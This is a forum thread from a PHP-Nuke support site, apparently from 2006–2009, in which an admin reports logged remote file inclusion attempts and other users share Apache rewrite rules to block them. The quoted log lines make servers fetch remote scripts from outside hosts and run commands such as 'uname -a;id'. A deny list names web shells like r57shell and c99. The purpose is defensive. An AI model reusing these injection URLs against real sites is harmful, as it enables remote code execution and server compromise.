| Author |
Message |
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
 Posted:
Tue Feb 21, 2006 3:55 am |
|
Perhaps some have seen my statement "Probably the most secure version of nuke ever" on my site over at www.code-authors.com and thought I was issuing a challenge.
The following attempts have been tried (for modules which do not exist  )
Code:modules/Forums/admin/admin_styles.php?phpbb_root_path=http://saudia.100free.com/asc.txt?&cmd=uname%20-a;id
|
Code:/modules/4nAlbum/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id
|
| Quote: | | /modules/My_eGallery/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id |
| Quote: | | /modules/My_eGallery/public/displayCategory.php?basepath=http://www.clan-ff.net/vwar/tool25.dat?&cmd=id |
These are quite obviously some sort of automated attack and needless to say they didnt work but what would be the best way to block such attacks? |
| |
|
 
|
|
djmaze
Subject Matter Expert
Joined: May 15, 2004
Posts: 727
Location: http://tinyurl.com/5z8dmv
|
| Posted:
Tue Feb 21, 2006 7:21 am |
|
Code:
RewriteCond %{QUERY_STRING} =http:// [NC]
RewriteRule ^.*$ - [F]
|
|
| |
|
|
|
Guardian2003
|
| Posted:
Tue Feb 21, 2006 7:39 am |
|
Interesting - thanks for that I'll try it and see what develops. |
| |
|
|
|
|
djmaze
|
| Posted:
Tue Feb 21, 2006 8:06 am |
|
here's even a better version that also denies ../../ as seen in rush attacks
for example an exploit in file=../../.htaccess
and another for UNION
RewriteCond %{QUERY_STRING} =../ [NC, OR]
RewriteCond %{QUERY_STRING} "%20UNION" [NC, OR]
RewriteCond %{QUERY_STRING} =http:// [NC]
RewriteRule ^.*$ - [F]
NOTE: this is will NOT make you 100% safe since phpnuke uses register_globals so an attack can also be made thru POST and COOKIE |
| |
|
|
|
|
Guardian2003
|
| Posted:
Tue Feb 21, 2006 8:59 am |
|
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Tue Feb 21, 2006 9:08 am |
|
admin_styles.php is a known attack that has hit phpBB systems (and those using phpBB derivates) several times.
Ditto 4nAlbum and My_eGallery using the same displayCategory.php
The attack on index.php is nothing I have seen. Must have been a "cat" variable vulnerable somewhere.
Does Sentinel not block these attacks?
---
For my site not using Sentinel, here's what I have right now.
Using DisError to capture the 404 messages and read the 'REDIRECT_URL'
If it includes anything on 'xmlrpc.php' 'awstats.pl' 'displayCategory.php' 'upgrade_album.php'
They get a banned |
_________________
- Only registered users can see links on this board! Get registered or login! -
Need help? Only registered users can see links on this board! Get registered or login! |
|
|
|
|
Guardian2003
|
| Posted:
Tue Feb 21, 2006 9:52 am |
|
evaders - with the exception of the third quote (above) none tripped Sentinel but that is probably due to my sloppy blocker configuration which I'm looking at right now. |
| |
|
|
|
|
spasticdonkey
RavenNuke(tm) Development Team
Joined: Dec 02, 2006
Posts: 1693
Location: Texas, USA
|
| Posted:
Wed Feb 18, 2009 12:57 am |
|
| djmaze wrote: | here's even a better version that also denies ../../ as seen in rush attacks
for example an exploit in file=../../.htaccess
and another for UNION
RewriteCond %{QUERY_STRING} =../ [NC, OR]
RewriteCond %{QUERY_STRING} "%20UNION" [NC, OR]
RewriteCond %{QUERY_STRING} =http:// [NC]
RewriteRule ^.*$ - [F]
NOTE: this is will NOT make you 100% safe since phpnuke uses register_globals so an attack can also be made thru POST and COOKIE |
I know this has come up several times here and there, but alot of the posts are years old... I wondered if there was some up-to-date recommendations for additional security via htaccess..? I've used these for some time, and my sentinel emails decreased dramatically after adding.. 
Code:RewriteCond %{HTTP_USER_AGENT} ^libwww [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond % _CONF [OR]
RewriteCond % tool25 [OR]
RewriteCond % cmd.txt [OR]
RewriteCond % r57shell [OR]
RewriteCond % c99 [OR]
RewriteCond % THEME_DIR [OR]
RewriteRule ^.* - [F,L]
RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]
|
I believe I was told the http one would break some admin functions such as verify downloads and weblinks, but never tried... but it will also stop alot of cross site scripting attacks...
just thought i would toss it out there, food for thought. |
| |
|
|
|
|
evaders99
|
| Posted:
Wed Feb 18, 2009 1:09 am |
|
phpNuke does pass http through some functions, mostly redirects. But otherwise, it is good to use |
| |
|
|
|
|
slackervaara
Worker
Joined: Aug 26, 2007
Posts: 236
|
| Posted:
Wed Feb 18, 2009 9:57 pm |
|
I also use this line:
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.* [OR] |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
